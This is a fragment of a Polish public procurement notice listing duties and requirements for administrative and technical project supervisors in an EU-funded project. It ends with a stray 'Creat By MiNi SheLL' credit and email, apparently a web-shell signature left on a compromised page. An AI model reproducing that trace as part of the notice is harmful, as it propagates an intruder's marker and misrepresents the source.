p)	realizacja zadań zgodnie z obowiązującymi przepisami prawa i wytycznymi PO IG;
q)	przestrzeganie wewnętrznych regulaminów i wytycznych obowiązujących u Zamawiającego.

Wymagane jest:
- wykształcanie średnie lub wyższe;
- staż pracy min. 3 m-cy
- znajomość tematyki związanej z realizacją projektów unijnych, a w  szczególności projektów realizowanych w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007 - 2013;
- prawo jazdy kat. B
- biegła obsługa komputera i aplikacji biurowych; 
- dobra organizacja pracy;
- dokładność i precyzja w działaniu;
- umiejętność pracy w zespole..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pełnienie funkcji opiekuna projektu ds. administracyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań opiekuna projektu ds. administracyjnych, należeć będzie:
a)	realizacja działań administracyjnych w projekcie;
b)	organizacja pracy biura projektu;
c)	prowadzenie dokumentacji administracyjnej, korespondencji w ramach projektów;
d)	współpraca z Kierownikiem Projektu, Specjalistą ds. obsługi finansowej;
e)	bieżący kontakt z uczestnikami projektu;
f)	prowadzenie dokumentacji związanej z realizacją zajęć (dokumenty uczestników projektu, listy obecności, dzienniki zajęć itp.) oraz innych działań w ramach projektu;
g)	nadzór nad zabezpieczeniem bazy lokalowej i technicznej na zajęcia (sale, sprzęt);
h)	nadzór nad prawidłowym przebiegiem zajęć zgodnie z harmonogramem zajęć;
i)	odpowiedzialność za prawidłowość prowadzonej dokumentacji związanej z realizacją wszelkich form wsparcia w projekcie;
j)	współpraca z wykonawcami/ osobami prowadzącymi kursy, zajęcia, doradztwo itp. w zakresie niezbędnym do realizacji procesu dydaktycznego;
k)	współpraca z administratorem strony internetowej projektu;
l)	współpraca z Kierownikiem projektu w zakresie przygotowania treści strony internetowej projektu;
m)	rzetelne i terminowe wykonywanie powierzonych zadań zgodnie z harmonogramem projektu;
n)	natychmiastowe informowanie Kierownika projektu o zaistniałych problemach i trudnościach związanych z realizacją projektu oraz zgłaszanie propozycji rozwiązań 
o)	przygotowanie i archiwizacja dokumentacji projektowej;
p)	realizacja zadań zgodnie z obowiązującymi przepisami prawa i wytycznymi PO IG;
q)	przestrzeganie wewnętrznych regulaminów i wytycznych obowiązujących u Zamawiającego.

Wymagane jest:
- wykształcanie średnie lub wyższe;
- staż pracy min. 3 m-cy
- znajomość tematyki związanej z realizacją projektów unijnych, a w  szczególności projektów realizowanych w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007 - 2013;
- prawo jazdy kat. B
- biegła obsługa komputera i aplikacji biurowych; 
- dobra organizacja pracy;
- dokładność i precyzja w działaniu;
- umiejętność pracy w zespole..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pełnienie funkcji opiekuna projektu ds. technicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań opiekuna projektu ds. technicznych, należeć będzie:
a)	przygotowanie umów użyczenia sprzętu komputerowego Beneficjentom Ostatecznym;
b)	organizacja przekazania sprzętu teleinformatycznego Beneficjentom Ostatecznym;
c)	udzielanie wsparcia technicznego
d)	kontrola  nad zakupionym w ramach projektu sprzętem komputerowym i teleinformatycznym;
e)	zapewnienie bezpłatnego dostępu do Internetu odbiorcom ostatecznym;
f)	udział i nadzorowanie procesu instalacji sprzętu teleinformatycznego i Internetu u Beneficjentów Ostatecznych;
g)	konserwacja i serwisowanie sprzętu teleinformatycznego zakupionego w ramach Projektu (u Beneficjentów Ostatecznych), w zakresie nieobjętym świadczeniami gwarancyjnymi;
h)	koordynacja współpracy z gwarantem w zakresie jakości i terminowości napraw sprzętu teleinformatycznego;
i)	prowadzenie dokumentacji ewidencyjnej sprzętu komputerowego i oprogramowania w okresie realizacji Projektu.

Wymagane jest:
- wykształcanie średnie lub wyższe (preferowane techniczne np. informatyka)
- znajomość tematyki związanej z realizacją projektów unijnych, a w  szczególności projektów realizowanych w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007 - 2013
- prawo jazdy kat. B
- umiejętność diagnozowania awarii sprzętu i oprogramowania komputerowego.
- znajomość zagadnień związanych z serwisem sprzętu i oprogramowania.
- znajomość obsługi urządzeń biurowych;
- dobra organizacja pracy;
- dokładność i precyzja w działaniu;
- umiejętność pracy w zespole.
- dyspozycyjność.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com